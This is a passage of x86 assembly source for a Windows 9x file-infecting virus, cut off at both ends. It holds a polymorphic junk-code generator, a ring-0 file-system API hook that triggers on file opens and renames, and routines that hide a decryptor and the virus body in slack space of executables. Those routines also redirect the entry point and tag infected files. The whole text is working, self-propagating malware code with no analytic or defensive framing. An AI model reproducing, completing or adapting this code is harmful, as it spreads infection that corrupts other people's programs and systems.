mov eax,[HowMuchTrash+ebp] ; 1/LinesOfTrash that we
; stop creating trash
inc eax
call Random
test eax,eax
jz Return
call GetWriteable
mov [ToOperand+ebp],eax
mov [ToType+ebp],ebx
call RandomOperand
mov [FromOperand+ebp],eax
mov [FromTypeOfValue+ebp],ebx
lea ebx,[RandomProcs+ebp]
xor eax,eax
xor ecx,ecx
xor edx,edx
mov cl, byte ptr [ebx]
Label36:
inc ebx
mov dl, byte ptr [ebx]
add eax,edx
loop Label36
call Random
lea ebx,[RandomProcs+ebp]
Label37:
inc ebx
mov dl, byte ptr [ebx]
sub eax, edx
jnc Label37
lea eax,[RandomProcs+ebp]
sub ebx,eax
dec ebx
shl ebx,2
inc ebx
mov dl,byte ptr [eax]
add ebx,edx
add ebx,eax
mov ebx,[ebx]
lea ebx,[InstructionData+ebx*8+ebp]
mov [EmulateInstruction+ebp],ebx
call EmuProc
jmp GenerateTrash
; ------------------------------------------------
; ---------------------------- Emulation functions
; ------------------------------------------------
AddInstruction:
add [eax+edx],ecx
ret
SubInstruction:
sub [eax+edx],ecx
ret
MovInstruction:
xor ebx,ebx
mov dword ptr [eax],ebx
mov dword ptr [eax+4],ebx
mov dword ptr [eax+8],ebx
mov dword ptr [eax+12],ebx
mov [eax+edx],ecx
ret
OrInstruction:
or [eax+edx],ecx
ret
XorInstruction:
xor [eax+edx],ecx
ret
AndInstruction:
and [eax+edx],ecx
ret
EmulateInstruction dd 0
ToOperand dd 0
ToType dd 0
FromOperand dd 0
FromTypeOfValue dd 0
EmuProc:
ChangeRegPart:
mov eax,[ToOperand+ebp]
mov ebx,[ToType+ebp]
mov edx,[EmulateInstruction+ebp]
mov edx,[edx+4]
shr ebx,2
inc ebx
call OutputOpcode
dec ebx
shl ebx,2
call UndefineDependentOperands
pushad
mov ebx,[EmulateInstruction+ebp]
mov ebx,[ebx+4]
cmp ebx,Op_mov
jnz Label34
mov eax,[ToOperand+ebp]
mov ebx,[ToType+ebp]
mov ecx,Undefined
call DeleteFromInfo
Label34:
popad
call IsOperandUndefined
jz ChangeOutput
call GetTable
mov ecx,[FromOperand+ebp]
mov edx,[FromTypeOfValue+ebp]
xor ebx,ebx
test edx,edx
jz ValueIsProperlyEmulated_DontNeedThisHack
add ebx,[eax]
ValueIsProperlyEmulated_DontNeedThisHack:
add ebx,[eax+4]
add ebx,[eax+8]
add ebx,[eax+12]
test ebx,ebx
jnz MakeUndefined
YesChangeIt:
mov ebx,[EmulateInstruction+ebp]
mov ebx,[ebx]
add ebx,ebp
call ebx
ChangeOutput:
call GetEqualValue
shr ebx,2
call Output
ret
MakeUndefined:
mov ebx,Undefined
or [eax+InfoPtr],ebx
jmp ChangeOutput
FoundEquals dd 0
ReadFromType dd 0
GetEqualValue:
xor ebx,ebx ; register table
mov [FoundEquals+ebp],ebx
mov [ReadFromType+ebp],ebx
mov ecx,Registers
call CompareOperands
mov ecx,[ToType+ebp]
cmp ecx,4
jae DontTryMemory
mov ecx,MemorySize
mov [ReadFromType+ebp],4
call CompareOperands
DontTryMemory:
push [FromOperand+ebp]
push [FromTypeOfValue+ebp]
mov eax,[FoundEquals+ebp]
inc eax
mov ecx,eax
call Random
imul eax,eax,8
mov ebx,[esp+eax]
mov eax,[esp+eax+4] ; eax = Operand
imul ecx,ecx,8
add esp,ecx
test ebx,ebx
jz Return ;
mov ecx,Writeable
call DeleteFromInfo ; delete writeable from mem
; might still create bugs!!!
; will be fixed in the future
; (the odds a bug will happen
; is extremly low)
ret
CompareOperands:
pop [ReturnAddress+ebp]
inc ecx
CmpLoop:
dec ecx
jnz Label30
jmp [ReturnAddress+ebp]
Label30:
mov eax,ecx
mov ebx,[ReadFromType+ebp]
call ReadOperand
cmp eax,[FromOperand+ebp]
jnz CmpLoop
cmp ebx,[FromTypeOfValue+ebp]
jnz CmpLoop
cmp ecx,[ToOperand+ebp]
jz CmpLoop
push ecx ; Operand
mov ebx,[ReadFromType+ebp] ; Type
add ebx,4
push ebx
inc [FoundEquals+ebp]
jmp CmpLoop
UndefineDependentOperands:
call IsOperandUndefined
jnz Return
pushad
xor ebx,ebx
mov ecx,Registers
call Undefine
mov ebx,4
mov ecx,MemorySize
call Undefine
popad
ret
Undefine:
inc ecx
mov edx,ebx
UndefineLoop:
dec ecx
jz Return
mov eax,ecx
mov ebx,edx
cmp eax,[ToOperand+ebp]
jz UndefineLoop
call ReadOperand
sub ebx,4
cmp ebx,[ToType+ebp]
jnz UndefineLoop
cmp eax,[ToOperand+ebp]
jnz UndefineLoop
push ecx
mov eax,ecx
mov ebx,edx
mov ecx,Undefined
call SetInfo
pop ecx
jmp UndefineLoop
; -----------------------------------------------
; -------------------------- High level functions
; -----------------------------------------------
RandomOperand:
mov eax,3+EndValueFrecuency
shr ebx,2 ; ebx = 0 or 1
sub eax,ebx ; eax = 3 or 2
call Random
xor ebx,ebx
test eax,eax
jz Random ; eax = 1 or 2
dec eax
jz GetReadableReg
sub eax,EndValueFrecuency+1
jz GetReadable
mov eax,[EndValue+ebp]
mov ebx,[EndTypeOfValue+ebp]
and ebx,111b
ret
GetWriteableReg:
call GetWriteableLabel1
test ebx,ebx
jnz GetWriteableReg
ret
; Returns a writeable operand
GetWriteable:
mov eax,3 ; create more reg then
call Random ; mem
test eax,eax
jnz GetWriteableReg
GetWriteableLabel1:
call GetReadable
mov ecx,Writeable
sub ebx,4
call TestInfo
jnz GetWriteableLabel1
ret
GetReadableReg:
call GetReadable
cmp ebx,4
jnz GetReadableReg
ret
; Returns a operand
GetReadable:
mov ebx,4
mov eax,Registers+MemorySize
call Random
inc eax
cmp eax,Registers+1
jl Return
shl ebx,1
sub eax,Registers+1
ret
; input
; eax = register or number
; ebx = number or register and value or mem
; ebx = 0 = number
; ebx = 1 = register
; ebx = 2 = [number]
; ebx = 3 = [register]
; ------------------------------------------
; ---------------------- Low level functions
; ------------------------------------------
Random:
push ebx
push ecx
push edx
mov ebx,eax
add eax,[RandomNumber+ebp]
mov cl,al
rol eax,cl
add eax,14
xor ecx,46
ror eax,cl
add eax,ecx
xor [RandomNumber+ebp],eax
test ebx,ebx
jz NoMod
xor edx,edx
div ebx
xchg eax,edx
NoMod:
pop edx
pop ecx
pop ebx
ret
; input
; edx = opcode
OutputOnlyOpcode:
add edi,16
and edi,0fffffff0h
bswap edx
mov [edi],edx
add edi,4
ret
OutputOpcode:
call OutputOnlyOpcode
jmp OutputNotComma
Output:
mov byte ptr [edi],','
inc edi
OutputNotComma:
push ecx
xor ecx,ecx
cmp ebx,1
setbe cl
lea ecx,[ecx*8+ecx]
push ecx
test ecx,ecx
jnz Label10
mov byte ptr [edi],'['
inc edi
Label10:
test ebx,1
setnz cl
shl ecx,2
add ecx,'N'
mov byte ptr [edi],cl
inc edi
cmp ecx,'N'
jz OutputNumber
add eax,'0'
stosb
sub eax,'0'
Label11:
pop ecx
test ecx,ecx
jnz Label12
mov byte ptr [edi],']'
inc edi
Label12:
pop ecx
ret
OutputNumber:
pop ecx
push ecx
test ecx,ecx
setnz cl
push eax
mov eax,'S'
mov byte ptr [edi+ecx-1],al ; variable
pop eax
stosd
jmp Label11
GetTable:
cmp ebx,8
stc
jz Return
dec eax
imul eax,eax,20 ; TableSize
add eax,[Tables+ebx+ebp]
clc
ret
SetInfo:
push eax
call GetTable
jc ReturnPopEax
or [eax+InfoPtr],ecx ; Set attribute
pop eax
ret
DeleteFromInfo:
push eax
call GetTable
jc ReturnPopEax
or [eax+InfoPtr],ecx ; Set attribute
xor [eax+InfoPtr],ecx ; Clear it
pop eax
ret
ChangeInfo:
push eax
call GetTable
jc ReturnPopEax
mov [eax+InfoPtr],ecx
pop eax
ret
IsOperandUndefined:
push ecx
mov ecx,Undefined
call TestInfo
pop ecx
jz Return
jc SetZeroFlag
ret
SetZeroFlag:
cmp eax,eax
ret
TestInfo:
push eax
call GetTable
jc ReturnPopEax
test [eax+InfoPtr],ecx
mov ecx,0
setnz cl
lahf
shl cl,6
btr ax,6+8
or ah,cl
sahf
pop eax
clc
ret
; eax = The operand
; ebx
; Which table to read from
ReadOperand:
call IsOperandUndefined
jz OperandIsUndefined
call GetTable
push ecx
xor ebx,ebx
mov ecx,16
FindValueLoop:
sub ecx,4
jecxz Label32
cmp [eax+ecx],ebx
jz FindValueLoop
Label32:
mov ebx,ecx
mov eax,[eax+ecx]
pop ecx
ret
OperandIsUndefined:
add ebx,4
ret
ReturnPopEax:
pop eax
ret
GetWhereFrom:
lea ebx,[FromWhere+ebp-4]
jmp GodDamnedLabelDammit
GetWhereTo:
lea ebx,[EndWhere+ebp-4]
GodDamnedLabelDammit:
push ebx
xor eax,eax
dec eax
GodDamnedLoopDammit:
add ebx,4
cmp eax,[ebx]
jz GodDamnedLoopDammit
mov eax,[ebx]
sub ebx,[esp]
sub ebx,4
add esp,4
ret
OutputPrefix:
push eax
xor eax,eax
cmp eax,[Prefix+ebp]
jz OutputPrefixEnd
add edi,16
and edi,0fffffff0h
mov eax,Op_db
bswap eax
stosd
xor eax,eax
inc eax
stosb
xor eax,eax
xchg eax,[Prefix+ebp]
stosb
OutputPrefixEnd:
pop eax
ret
Optimize:
call ClearDoNothingInstrucions
; call ClearUnnessesaryInstructions
xchg esi,edi
ret
MaybeUnnessesaryInstructions:
dd Op_mov, Op_add, Op_sub, Op_and, Op_or, Op_xor
MaybeUnnessesaryInstructionsEnd:
ClearUnnessesaryInstructions:
push edi
sub esi,16
ClearUnnessesaryInstructionsLoop:
push edi
add esi,16
and esi,0fffffff0h
lodsd
bswap eax
lea edi,[MaybeUnnessesaryInstructions+ebp]
mov ecx,(MaybeUnnessesaryInstructionsEnd-MaybeUnnessesaryInstructions)/4
repnz scasd
test ecx,ecx
jz DontOptimize2
xor eax,eax
.while (al!=',')
lodsb
.endw
mov edi,esi
mov ecx,1000h
FindNextEntry:
; rep scasb
jecxz DontOptimize2
mov ebx,edi
and edi,0fffffff0h
sub ebx,edi
cmp ebx,4
jz DontOptimize2
mov ebx,Op_mov
cmp [edi],ebx
jnz FindNextEntry
pop edi
jmp ClearUnnessesaryInstructionsLoop
DontOptimize2:
pop edi
and esi,0fffffff0h
mov ecx,16
rep movsb
sub esi,16
jmp ClearUnnessesaryInstructionsLoop
pop edi
ret
ClearDoNothingInstrucions:
push edi
sub esi,16
xor ecx,ecx
OptimizeLoop:
add esi,16
and esi,0fffffff0h
push esi
lodsd
test eax,eax
jz OptimizeEnd
bswap eax
cmp eax,Op_mov
jnz DontOptimize
xor eax,eax
lodsw
mov ebx,eax
lodsb
lodsw
cmp ebx,eax
jnz DontOptimize
pop esi
jmp OptimizeLoop
DontOptimize:
mov ecx,16
pop esi
rep movsb
sub esi,16
jmp OptimizeLoop
OptimizeEnd:
test ecx,ecx
jnz OptimizeDoReallyQuit
mov ecx,16
pop esi
rep movsb
sub esi,16
inc ecx
jmp OptimizeLoop
OptimizeDoReallyQuit:
pop eax
pop edi
ret
; 1. Init block
; offset 0
; pushad
; 2. Make pointer to mem
; 3. Read block
; Encrypt block
; Write block
; popad
; 5. Change mempointer block
; 6. Compare and jump block
PE_Objects equ 6
PE_NTHdrSize equ 20
PE_Entrypoint equ 40
PE_ImageBase equ 52
PE_ObjectAlign equ 56
PE_FileAlign equ 60
PE_ImageSize equ 80
Obj_Name equ 0
Obj_VirtualSize equ 8
Obj_VirtualOffset equ 12
Obj_PhysicalSize equ 16
Obj_PhysicalOffset equ 20
Obj_Flags equ 36
IFSMgr equ 0040h
R0_AllocMem equ 000dh
R0_FreeMem equ 000eh
Ring0_FileIO equ 0032h
InstallFileSystemAPIhook equ 0067h
UniToBCSPath equ 0041h
ResidentcodeStart:
jmp FileFunction
R0_OPENCREATFILE equ 0D500h ; Open/Create a file
R0_READFILE equ 0D600h ; Read a file, no context
R0_WRITEFILE equ 0D601h ; Write to a file, no context
R0_CLOSEFILE equ 0D700h
IFSFN_FILEATTRIB equ 33
IFSFN_OPEN equ 36
IFSFN_RENAME equ 37
IFSFN_READ equ 0 ; read a file
IFSFN_WRITE equ 1 ; write a file
FileIOWrite:
mov eax,R0_WRITEFILE
mov ebx,[FileHandle+edi]
pop [ReturnAddr+edi]
push Ring0_FileIO
jmp Label6
FileIOReadDWordToSlack:
mov ecx,4 ; how many bytes
FileIOReadToSlack:
lea esi,[Slack+edi] ; where to place data
FileIORead:
mov eax,R0_READFILE
FileIOHandle:
mov ebx,[FileHandle+edi]
FileIO:
pop [ReturnAddr+edi]
push Ring0_FileIO
jmp Label6
vxd:
pop [ReturnAddr+edi]
Label6:
pop [CallService+edi+2]
mov word ptr [CallService+edi],20cdh
mov word ptr [CallService+edi+4],0040h
jmp CallService
CallService:
Slack:
int 20h
dw 0dh
dw 0040h
jmp [ReturnAddr+edi]
ZeroRegStart:
db 0
FileToInfect db 256 dup (0)
TempPtr dd 0
TotalSize dd 0
OldAPIFunction dd 0
GuidePos dd 0
GuideSize dd 0
DecryptorPos dd 0
DecryptorSize dd 0
HeaderSize dd 0
VirusInRing0Mem dd 0
MemoryTable dd 0
VirtualDataSegment dd 0
ReturnAddr dd 0
ReturnAddr2 dd 0
Flag dd 0
FileHandle dd 0
PEHeadOfs dd 0
PEHeadStart dd 0
ObjTable dd 0
CodeObjectPtr dd 0
DataObjectPtr dd 0
LastObjectPtr dd 0
SlackInCodeSegment dd 0
SlackInDataSegment dd 0
OldRVA dd 0
StackSave dd 0
NewVirusOffset dd 0
JumpTableMoveOffset dd 0
NewGuideOffset dd 0
NewDecryptorOffset dd 0
NewDataSegmentOffset dd 0
Unload dd 0
ZeroRegEnd:
; eax = how much free space
; ebx = where it is located
; ecx = pointer to segment object table
; edx = last object pointer
GetSegmentSlack:
pop [ReturnAddr2+edi]
mov eax,[PEHeadStart+edi]
lea ebx,[eax+24]
xor ecx,ecx
mov cx,[eax+PE_NTHdrSize] ; NT hdr size
add ebx,ecx ; ebx -> object table
mov cx,[eax+PE_Objects] ; # objects
imul ecx,ecx,40
add ecx,ebx
push ecx ; push pointer to last object
; + 40
FindCodeSegmentLoop:
sub ecx,8*5
cmp ecx,ebx
jl DidntFindSegment
cmp dword ptr [ecx],edx ; is code object?
jnz FindCodeSegmentLoop
pop edx ; pop pointer to last object
sub edx,40
mov eax,[ecx+Obj_PhysicalSize] ; size of segment
mov ebx,[ecx+Obj_PhysicalOffset] ; where does segment start
call CalculateFreeSpace
jmp [ReturnAddr2+edi]
DidntFindSegment:
pop eax
xor eax,eax
jmp [ReturnAddr2+edi]
SegmentSize dd 0
SegmentOffset dd 0
SegmentBuffer dd 0
CalculateFreeSpace:
push ecx
push edx
mov [SegmentSize+edi],eax
mov [SegmentOffset+edi],ebx
push eax
push R0_AllocMem
call vxd
pop ecx
test eax,eax
jz FileFunctionEndAddEsp
mov [SegmentBuffer+edi],eax
mov edx,[SegmentOffset+edi] ; read from
mov esi,eax ; read to
mov ecx,[SegmentSize+edi] ; how much to read
call FileIORead
mov ebx,edi
mov edi,[SegmentBuffer+ebx]
add edi,[SegmentSize+ebx]
sub edi,4 ; edi -> end of segment
push edi ; push end of seg
xor eax,eax
xor ecx,ecx
dec ecx
std
repz scasb
cld
dec eax
sub eax,ecx
mov edi,ebx
pop ebx ; end of seg
sub ebx,8 ; decrease some
push eax ; push number of slack bytes
mov eax,[SegmentBuffer+edi]
sub ebx,eax
push eax
push R0_FreeMem
call vxd
pop eax
pop eax ; eax = slackbytes in codeseg
sub eax,20 ; some safety
sub ebx,eax ; where slack starts
pop edx
pop ecx
ret
; ----------------------------------------
; --------------------------- FileFunction
; ----------------------------------------
FileFunction:
push ebp
mov ebp,esp
push edi
push esi
push ebx
BasePtr:
mov edi,66666666h
cmp [Unload+edi],1
jz CallInOurFunction
xor eax,eax
inc eax
cmp [Flag+edi],eax
jz CallInOurFunction
mov [Flag+edi],eax
mov eax,[ebp+12]
cmp eax,IFSFN_OPEN
jz CheckFilename
cmp eax,IFSFN_FILEATTRIB
jz CheckFilename
cmp eax,IFSFN_RENAME
jnz FileFunctionEnd
CheckFilename:
mov eax,[ebp+16]
test eax,eax
jz FileFunctionEnd
cmp eax,0ffh
jz FileFunctionEnd
cmp eax,25
ja FileFunctionEnd
add eax,'a'-1
add eax,':'*256
lea esi,[FileToInfect+edi]
mov word ptr [esi],ax
add esi,2
push 0
push 250
mov eax,[ebp+28]
mov eax,[eax+12]
add eax,4
push eax
push esi
push UniToBCSPath
call vxd
add esp,16
mov byte ptr [esi+eax],0
cmp dword ptr [esi+eax-4],'EXE.'
jne FileFunctionEnd
xor ebx,ebx
cmp dword ptr [esi+1],'OLNU' ; is catalog starting on unlo
setz bl
mov [Unload+edi],ebx ; unload virus then
cmp dword ptr [esi],'FNI' ; dont infect files in win*
jne FileFunctionEnd ; if there is a bug we dont
; to hurt system critical
; files
sub esi,2
mov bx,2
mov cx,0
mov dx,1h
mov eax,R0_OPENCREATFILE
call FileIO
jc FileFunctionEnd
mov [FileHandle+edi],eax
xor edx,edx ; where to read in file
call FileIOReadDWordToSlack
jc FileFunctionEndCloseFile
cmp word ptr [Slack+edi],'ZM'
jnz FileFunctionEnd
mov edx,3ch ; where to read in file
call FileIOReadDWordToSlack
mov edx,[Slack+edi]
mov [PEHeadOfs+edi],edx
call FileIOReadDWordToSlack
cmp word ptr [Slack+edi],'EP'
jnz FileFunctionEndCloseFile
mov edx,[PEHeadOfs+edi]
add edx,84
call FileIOReadDWordToSlack
mov ecx,[Slack+edi] ; size of exehead, pehead and
; objtable
mov edx,[PEHeadOfs+edi]
sub ecx,edx ; size of pehead and objtable
cmp ecx,1000h
ja FileFunctionEndCloseFile
mov [HeaderSize+edi],ecx
lea eax,[ecx+20]
; allocate mem for PEHeader
push eax
push R0_AllocMem
call vxd
pop ecx
test eax,eax
jz FileFunctionEndCloseFile
mov ecx,[HeaderSize+edi]
mov edx,[PEHeadOfs+edi]
mov esi,eax
mov [PEHeadStart+edi],esi
call FileIORead
mov eax,[PEHeadStart+edi]
cmp word ptr [eax],'EP'
jnz FileFunctionEndAddEsp
mov ebx,'y3k?' ; already infected
cmp [eax+12],ebx
jz FileFunctionEndAddEsp
mov edx,'xet.'
call GetSegmentSlack
; eax = how much free space
; ebx = where it is located
; ecx = pointer to segment object table
; edx = pointer to last object table
cmp eax,[GuideSize+edi]
jl FileFunctionEndAddEsp
mov [CodeObjectPtr+edi],ecx ; save offset of code object
mov [SlackInCodeSegment+edi],ebx
mov edx,'tad.'
call GetSegmentSlack
test eax,eax
jz FileFunctionEndAddEsp
mov [DataObjectPtr+edi],ecx ; save offset of data object
push eax
push ebx
.if (ecx==edx)
mov ebx,[PEHeadStart+edi]
mov eax,[ebx+PE_FileAlign+8] ; file align
.else
mov eax,[ecx+Obj_PhysicalSize] ; physical size
.endif
mov ebx,[ecx+Obj_VirtualSize] ; - virtual size
sub eax,ebx ; = free space
mov [SlackInDataSegment+edi],ebx
cmp eax,MemorySize*4 ; if this is true we can be
jg InfectFile ; 'sure' no bug will occure.
add eax,ebx ; size of .data segment on
; disk
sub eax,MemorySize*4+10 ; some safety
pop ebx ; where in file the zero
add ebx,200h ; slack starts
sub eax,ebx
pop eax ; size of slack block
jc FileFunctionEndAddEsp
sub eax,250h+MemorySize*4 ; enough mem free
jc FileFunctionEndAddEsp ; this method is more risky
; will bug out if the
; infected program relies
; on the data to be cleared
sub esp,8
mov [SlackInDataSegment+edi],ebx
InfectFile:
add esp,8
mov [LastObjectPtr+edi],edx ; ptr to last object table
mov ecx,[PEHeadStart+edi]
mov edx,[ecx+PE_Entrypoint] ; save old RVA
mov [OldRVA+edi],edx
mov ecx,[CodeObjectPtr+edi]
mov ebx,[SlackInCodeSegment+edi]
BreakPoint:
mov eax,ebx ; ebx = how far in is free
; space
add ebx,[ecx+Obj_VirtualOffset] ; ebx = free space in mem
mov edx,[PEHeadStart+edi]
mov [edx+PE_Entrypoint],ebx ; save new RVA
add eax,[ecx+Obj_PhysicalOffset] ; eax = free space in file
mov [NewGuideOffset+edi],eax
mov ecx,[DataObjectPtr+edi]
mov eax,[ecx+Obj_VirtualOffset] ; data space in mem
add eax,[SlackInDataSegment+edi] ; free data space in mem
add eax,(MemorySize-1)*4
add eax,[edx+PE_ImageBase] ; add with image base
mov ecx,MemorySize
mov ebx,[MemoryTable+edi]
mov edx,0ch
mov [ebx+ecx*4],edx ; used in fs:[0c]
sub ebx,4
CopyPointersToMem:
mov [ebx+ecx*4],eax
sub eax,4
dec ecx
jnz CopyPointersToMem
add ebx,4
mov [PointerToDataSlack+edi],ebx
mov ebx,[LastObjectPtr+edi]
mov eax,[VirtualDataSegment+edi]
mov ecx,[ebx+Obj_VirtualOffset] ; virtual offset
add ecx,[ebx+Obj_PhysicalSize] ; physical size
mov edx,[PEHeadStart+edi]
add ecx,[edx+PE_ImageBase] ; add with imagebase
mov [eax+8],ecx ; Decryptor Entrypoint
mov edx,[OldRVA+edi]
mov ebx,[PEHeadStart+edi]
add edx,[ebx+PE_ImageBase] ; add with image base
mov [eax],edx ; Program entrypoint
mov ebx,[DataObjectPtr+edi]
mov ecx,[ebx+Obj_VirtualOffset] ; Virtual offset
add ecx,[SlackInDataSegment+edi] ; Virtual offset of data slack
mov edx,[PEHeadStart+edi]
add ecx,[edx+PE_ImageBase] ; add with image base
mov [eax+4],ecx
mov ecx,[ebx+Obj_PhysicalOffset]
add ecx,[SlackInDataSegment+edi] ; Physical offset of data slack
mov [NewDataSegmentOffset+edi],ecx
mov ebx,[LastObjectPtr+edi]
mov ecx,[ebx+Obj_PhysicalSize] ; physical size
add ecx,[ebx+Obj_PhysicalOffset] ; physical offset
mov [NewDecryptorOffset+edi],ecx ; Entrypoint in file
mov edx,[eax+8] ; decryptor start
add edx,[DecryptorSize+edi]
mov [eax+12],edx ; save where to start decrypt
; write Guide
pushad
mov esi,[GuidePos+edi]
mov eax,[GuideSize+edi]
add eax,100
; allocate mem for PEHeader
push eax
push R0_AllocMem
call vxd
pop ecx
test eax,eax
jz FileFunctionEndCloseFile
mov [TempPtr+edi],eax
push edi
mov ebp,edi
mov edi,eax
call Compile
pop edi
mov edx,[NewGuideOffset+edi] ; write to
mov ecx,[GuideSize+edi] ; write ecx bytes
call FileIOWrite
mov eax,[TempPtr+edi]
push eax
push R0_FreeMem
call vxd
pop eax
mov esi,[DecryptorPos+edi]
mov eax,[DecryptorSize+edi]
add eax,100
; allocate mem for PEHeader
push eax
push R0_AllocMem
call vxd
pop ecx
test eax,eax
jz FileFunctionEndCloseFile
mov [TempPtr+edi],eax
push edi
mov ebp,edi
mov edi,eax
call Compile
pop edi
; write Decryptor
mov edx,[NewDecryptorOffset+edi]
mov ecx,[DecryptorSize+edi]
call FileIOWrite
mov eax,[TempPtr+edi]
push eax
push R0_FreeMem
call vxd
pop eax
popad
mov edx,[NewDataSegmentOffset+edi]
mov ecx,MemorySize*4
mov esi,[VirtualDataSegment+edi]
call FileIOWrite
mov edx,[NewDecryptorOffset+edi]
add edx,[DecryptorSize+edi]
mov ecx,VSize
mov esi,[VirusInRing0Mem+edi]
call FileIOWrite
mov ebx,VSize
add ebx,[DecryptorSize+edi]
mov esi,[LastObjectPtr+edi]
mov eax,[esi+Obj_PhysicalSize] ; physical size
add eax,ebx ; add with new virussize
add eax,100 ; safety
mov edx,[PEHeadStart+edi]
mov ecx,[edx+PE_ObjectAlign] ; object align
xor edx,edx
div ecx
inc eax
xor edx,edx
mul ecx
.if eax>[esi+8]
mov [esi+Obj_VirtualSize],eax ; save new virtual size
.endif
mov eax,[esi+Obj_PhysicalSize] ; physical size
add eax,ebx ; add with virus size
add eax,20 ; safety
mov edx,[PEHeadStart+edi]
mov ecx,[edx+PE_FileAlign] ; file align
xor edx,edx
div ecx
inc eax
xor edx,edx
mul ecx
mov [esi+Obj_PhysicalSize],eax ; save new physical size
mov eax,'y3k?'
mov ecx,[PEHeadStart+edi]
mov [ecx+12],eax
mov eax,[LastObjectPtr+edi]
mov esi,0c0000040h
mov [eax+Obj_Flags],esi
mov eax,[ecx+PE_ImageSize] ; size of image
add eax,VirusSize ; add with virussize
mov ecx,[ecx+PE_ObjectAlign] ; object aligment
xor edx,edx
div ecx
inc eax
xor edx,edx
mul ecx ; new size of image in eax
mov esi,[PEHeadStart+edi]
mov [esi+PE_ImageSize],eax ; save it
mov edx,[PEHeadOfs+edi] ; write to
mov ecx,[HeaderSize+edi]
call FileIOWrite
FileFunctionEndAddEsp:
mov eax,[PEHeadStart+edi]
push eax
push R0_FreeMem
call vxd
pop eax
FileFunctionEndCloseFile:
mov eax,R0_CLOSEFILE
call FileIOHandle
FileFunctionEnd:
xor eax,eax
mov [edi+Flag], eax
CallInOurFunction:
mov eax,[edi+OldAPIFunction]
mov ecx,edi
pop ebx
pop esi
pop edi
pop ebp
pop [ReturnFromHook+ecx]
lea edx,[ReturnFromHook+ecx+4]
sub [ReturnFromHook+ecx],edx
call dword ptr [eax]
db 0e9h
ReturnFromHook:
dd 0
; ------------------------------
; --------------------- Compiler
; ------------------------------
PointerToRandomMemory equ MemorySize
PointerToDataSlack dd 0
SavedOffsets dd 10 dup (-1)
InstructionTable:
dd Op_add
dd Op_and
dd Op_cmp
dd Op_or
dd Op_sub
dd Op_xor
dd Op_mov
dd Op_jmp
dd Op_jnz
dd Op_jnb
dd Op_jna
dd Op_offset
dd Op_db
InstructionTableEnd:
InstructionTables:
AddTable:
dd DefaultProc1
db 00000000b
db 10000000b
db 00000100b
db 000b
AndTable:
dd DefaultProc1
db 00100000b
db 10000000b
db 00100100b
db 100b
CmpTable:
dd DefaultProc1
db 00111000b
db 10000000b
db 00111100b
db 111b
OrTable:
dd DefaultProc1
db 00001000b
db 10000000b
db 00001100b
db 001b
SubTable:
dd DefaultProc1
db 00101000b
db 10000000b
db 00101100b
db 101b
XorTable:
dd DefaultProc1
db 00110000b
db 10000000b
db 00110100b
db 110b
MovTable:
dd MoveProc
db 10001000b
db 11000110b
db 10111000b
db 000b
JmpTable:
dd JmpProc
dd 0
JnzTable:
dd JxxProc
db 0101b
db 0,0,0
JnbTable:
dd JxxProc
db 0011b
db 0,0,0
JnaTable:
dd JxxProc
db 0110b
db 0,0,0
OffsetTable:
dd OffsetProc
dd 0
DeclareByteTable:
dd DeclareByteProc
dd 0
ToValue dd 0
ToTypeOfValue dd 0
SecondValue dd 0
SecondTypeOfValue dd 0
Instruction dd 0,0,0
InstructionLength dd 0
RegistersBitValue:
dd 0
IntelEax dd 000b
IntelEbx dd 011b
IntelEcx dd 001b
IntelEdx dd 010b
IntelEsi dd 110b
IntelEdi dd 111b
IntelEsp dd 100b
ReadInstruction1:
push edi
lea edi,[InstructionTable+ebp]
mov ecx,(InstructionTableEnd-InstructionTable)/4+1
add esi,16
and esi,0fffffff0h
lodsd
bswap eax
push edi
repnz scasd
sub edi,[esp]
shl edi,1
lea ebx,[edi+4-8+InstructionTables+ebp]
mov eax,[ebx-4]
add eax,ebp
pop edi
pop edi
test ecx,ecx
jz CompileEnd
jmp eax
ReadOperands:
call GetOperand
mov [ToValue+ebp],eax
mov [ToTypeOfValue+ebp],ebx
mov al,byte ptr [esi]
cmp al,','
jnz Return
inc esi
call GetOperand
mov [SecondValue+ebp],eax
mov [SecondTypeOfValue+ebp],ebx
ret
SetDirectionBit:
call WhatOperandIsRegMem
setl bl
shl ebx,1
or [Instruction+ebp],ebx
ret
GetOther:
call WhatOperandIsRegMem
jnl Label40
mov eax,[ToValue+ebp]
mov ebx,[ToTypeOfValue+ebp]
ret
GetRegMem:
call WhatOperandIsRegMem
jl Label40
mov eax,[ToValue+ebp]
mov ebx,[ToTypeOfValue+ebp]
ret
Label40:
mov eax,[SecondValue+ebp]
mov ebx,[SecondTypeOfValue+ebp]
ret
RegMem_Reg equ 0
RegMem_Immediate equ 1
Eax_Immediate equ 2
FetchOpcode:
call GetRegMem
cmp ebx,4
setz bl
cmp eax,1
setz al
and eax,ebx
mov ecx,eax
call GetOther
xor eax,eax
test ebx,ebx
jnz Return
inc eax
add eax,ecx
ret
WhatOperandIsRegMem:
xor ebx,ebx
mov eax,[ToTypeOfValue+ebp]
cmp eax,[SecondTypeOfValue+ebp]
ret
FixAddresses:
lea edx,[Instruction+ebp]
add edx,[InstructionLength+ebp]
call GetRegMem
xor ecx,ecx
cmp ebx,8
setl cl
imul ecx,ecx,3
shl ecx,6
cmp ebx,8
jz MemoryValue
mov eax,[eax*4+RegistersBitValue+ebp]
or ecx,eax
jmp Label43
MemoryValue:
or ecx,101b
mov [edx+1],eax
add [InstructionLength+ebp],4
Label43:
inc [InstructionLength+ebp]
call GetOther
test ebx,ebx
jz LastOperandIsImmediate
mov eax,[eax*4+RegistersBitValue+ebp]
shl eax,3
or ecx,eax
mov byte ptr [edx],cl
ret
LastOperandIsImmediate:
push edx
lea edx,[Instruction+ebp]
add edx,[InstructionLength+ebp]
mov [edx],eax
add [InstructionLength+ebp],4
pop edx
or byte ptr [edx],cl
ret
OutputInstruction:
push esi
lea esi,[Instruction+ebp]
mov ecx,[InstructionLength+ebp]
rep movsb
pop esi
ret
; input
; Edi -> where to put compiled code
; Esi -> code to compile
; return
; eax = where to put compiled code
; ebx = size of compiled code
Compile:
push edi
sub esi,16
CompileAgain:
mov [Instruction+ebp],0
mov [InstructionLength+ebp],0
call ReadInstruction1
mov al,0c3h
mov byte ptr [edi],al
jmp CompileAgain
CompileEnd:
pop esi
pop esi
mov eax,edi
sub eax,esi
ret
OffsetProc:
call AsciiToNum
mov [SavedOffsets+ebp+eax*4],edi
ret
DeclareByteProc:
xor eax,eax
lodsb
mov ecx,eax
rep movsb
ret
MoveProc:
push ebx
call ReadOperands
call SetDirectionBit
call FetchOpcode
test eax,eax
jz DefaultProc1Label1
call GetRegMem
mov ecx,eax
mov eax,1
